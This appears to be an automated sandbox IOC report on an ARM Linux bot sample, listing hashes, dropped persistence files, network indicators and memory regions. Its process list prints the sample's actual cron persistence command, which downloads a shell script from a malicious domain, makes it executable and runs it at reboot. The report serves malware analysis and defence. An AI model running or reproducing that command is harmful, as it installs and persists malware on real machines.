Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

nsharm7.elf

ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped

initial sample

Details

Filetype:	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
Entropy:	6.172622310669632
Filename:	nsharm7.elf
Filesize:	103696
MD5:	ca210ee9b185a078d977e3f9f421e2da
SHA1:	99a8fdf8489095caf3ba316f5f75561400bb64d5
SHA256:	d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125
SHA512:	fbbbda938ecfd86d1f0d6f445b32631dff779a29ebc936ca6379230555c1cb3d4a81e7cceaccf382775ce584012c0750e784a9c96de11ec0b16daf6036f9d02c
SSDEEP:	3072:JTnKSqnPWkyyRebaVf4GwBLFCsfIUuFeStQjX:JTnZmWkyDbaVf4GwBRCslusSOjX
Preview:	.ELF..............(.........4...@.......4. ...(........p............ ... ................................................................b..........................................Q.td..................................-...L..................@-.,@...0....S

Signature Hits	Behavior Group	Mitre Attack
Multi AV Scanner detection for submitted file	AV Detection
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions	Persistence and Installation Behavior	Unix Shell Configuration Modification
Creates hidden files and/or directories	Persistence and Installation Behavior	Hidden Files and Directories
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior
Sample listens on a socket	Networking
Uses the "uname" system call to query kernel version information (possible evasion)	Malware Analysis System Evasion	Security Software Discovery
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion

/root/.bashrc

ASCII text

dropped

Details

File:	/root/.bashrc
Category:	dropped
Dump:	.bashrc.12.dr
ID:	dr_1
Target ID:	12
Process:	/tmp/nsharm7.elf
Type:	ASCII text
Entropy:	4.380927423351128
Encrypted:	false
Ssdeep:	3:aKVMFDEIGXjQJZWvYKQzQRFxFdljEIGXjQJZWv1SeDkiJCF9:DMFDKXsJovYL8jndFKXsJovFkTF9
Size:	124
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions	Persistence and Installation Behavior	Unix Shell Configuration Modification
Creates hidden files and/or directories	Persistence and Installation Behavior	Hidden Files and Directories

/var/spool/cron/crontabs/tmp.QYPaEb

ASCII text

dropped

Details

File:	/var/spool/cron/crontabs/tmp.QYPaEb
Category:	dropped
Dump:	tmp.QYPaEb.18.dr
ID:	dr_2
Target ID:	18
Process:	/usr/bin/crontab
Type:	ASCII text
Entropy:	5.156023571745438
Encrypted:	false
Ssdeep:	6:SUrpqoqQjEOP1KmREJOBFQkqZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJo0:8QjHig8deHLUHYC+GABjnOGAFkz
Size:	306
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Sample tries to persist itself using cron	Persistence and Installation Behavior

/etc/init/bot.conf

ASCII text

dropped

Details

File:	/etc/init/bot.conf
Category:	dropped
Dump:	bot.conf.12.dr
ID:	dr_0
Target ID:	12
Process:	/tmp/nsharm7.elf
Type:	ASCII text
Entropy:	4.726559471748614
Encrypted:	false
Ssdeep:	6:SqEeZK8z7oXKqWFIw3CaXQw3cjICQDMFDKXsJovYL8jndFKXsJovFkTFdVOYHIaU:GeZfUX9HACcTSICQg+GABjnOGAFkROS2
Size:	346
Whitelisted:	false
Reputation:	low

Processes

Path

Cmdline

Malicious

/tmp/nsharm7.elf

/bin/sh

/bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

/bin/sh

/usr/bin/crontab

crontab -l

/bin/sh

/usr/bin/crontab

crontab -

/tmp/nsharm7.elf

/bin/sh

/bin/sh -c "/sbin/initctl start bot"

/bin/sh

/tmp/nsharm7.elf

There are 4 hidden processes, click here to show them.

URLs

Name

Malicious

http://hailcocks.ru/wget.sh;

unknown

Details

Name:	http://hailcocks.ru/wget.sh;
TargetID:	18
From Memory:	true
Current Path:	/usr/bin/crontab
Source:	tmp.QYPaEb.18.dr

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
URLs found in memory or binary data	Networking

Domains

Name

Malicious

daisy.ubuntu.com

162.213.35.24

kingstonwikkerink.dyn

81.29.149.178

Details

Name:	kingstonwikkerink.dyn
IP:	81.29.149.178
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

IPs

Domain

Country

Malicious

88.151.195.22

unknown

Azerbaijan

Details

IP:	88.151.195.22
TargetID:	-1
Country:	Azerbaijan
Countrycode:	AZE
ASN number:	15723
ASN name:	AZERONLINEAZ
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

193.233.193.45

unknown

Russian Federation

Details

IP:	193.233.193.45
TargetID:	-1
Country:	Russian Federation
Countrycode:	RUS
ASN number:	2895
ASN name:	FREE-NET-ASFREEnetEU
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

81.29.149.178

kingstonwikkerink.dyn

Switzerland

Details

IP:	81.29.149.178
TargetID:	-1
Country:	Switzerland
Countrycode:	CHE
ASN number:	39616
ASN name:	COMUNICA_IT_SERVICESCH
Private:	false
Domain:	kingstonwikkerink.dyn

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

91.149.218.232

unknown

Poland

Details

IP:	91.149.218.232
TargetID:	-1
Country:	Poland
Countrycode:	POL
ASN number:	198401
ASN name:	GECKONET-ASPL
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

Memdumps

Base Address

Regiontype

Protect

Malicious

7f81c04e5000

page read and write

7f81c052a000

page read and write

7f81c01b7000

page read and write

7ffd4ad06000

page execute read

7f81b8021000

page read and write

55d0e2290000

page read and write

7ffd4ace2000

page read and write

7f81c0398000

page read and write

7f81bfbdb000

page read and write

7ffd4ad06000

page execute read

7ffd4ace2000

page read and write

7f81c0398000

page read and write

7f80b8038000

page read and write

7f81c04e5000

page read and write

7f81b8021000

page read and write

55d0e2290000

page read and write

55d0e2279000

page execute and read and write

55d0e3b3a000

page read and write

7f81bfe46000

page read and write

55d0e2279000

page execute and read and write

7f81befdf000

page read and write

7f81c04c1000

page read and write

7f81bf879000

page read and write

7f81c04c1000

page read and write

55d0e2279000

page execute and read and write

7f80b8030000

page execute read

7f81bfe69000

page read and write

7f81befdf000

page read and write

7f80b8030000

page execute read

55d0e3b3a000

page read and write

7f81bffd5000

page read and write

7f81befdf000

page read and write

7f80b8040000

page read and write

7f81b8021000

page read and write

7f81bffd5000

page read and write

7f81c01b7000

page read and write

7f80b8030000

page execute read

7f81bf879000

page read and write

7f81b7fff000

page read and write

7f81c04c1000

page read and write

55d0e0272000

page read and write

7f81bf879000

page read and write

55d0e027b000

page read and write

7ffd4ad06000

page execute read

7f81bfe69000

page read and write

55d0e0021000

page execute read

7f81bffd5000

page read and write

7f81bfe46000

page read and write

55d0e3b3a000

page read and write

7ffd4ace2000

page read and write

7f81bf7e7000

page read and write

7f80b8040000

page read and write

7f81c04e5000

page read and write

7f81bf7e7000

page read and write

55d0e0021000

page execute read

7f81bfbdb000

page read and write

7f80b8040000

page read and write

7f81bf7e7000

page read and write

55d0e027b000

page read and write

7f80b8038000

page read and write

7f81b7fff000

page read and write

7f81c052a000

page read and write

55d0e0272000

page read and write

55d0e0021000

page execute read

7f81b7fff000

page read and write

7f81c0398000

page read and write

55d0e027b000

page read and write

7f81c01b7000

page read and write

7f81bfe46000

page read and write

7f81bfe69000

page read and write

7f80b8038000

page read and write

55d0e2290000

page read and write

55d0e0272000

page read and write

7f81c052a000

page read and write

7f81bfbdb000

page read and write

There are 65 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
nsharm7.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportnsharm7.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
nsharm7.elf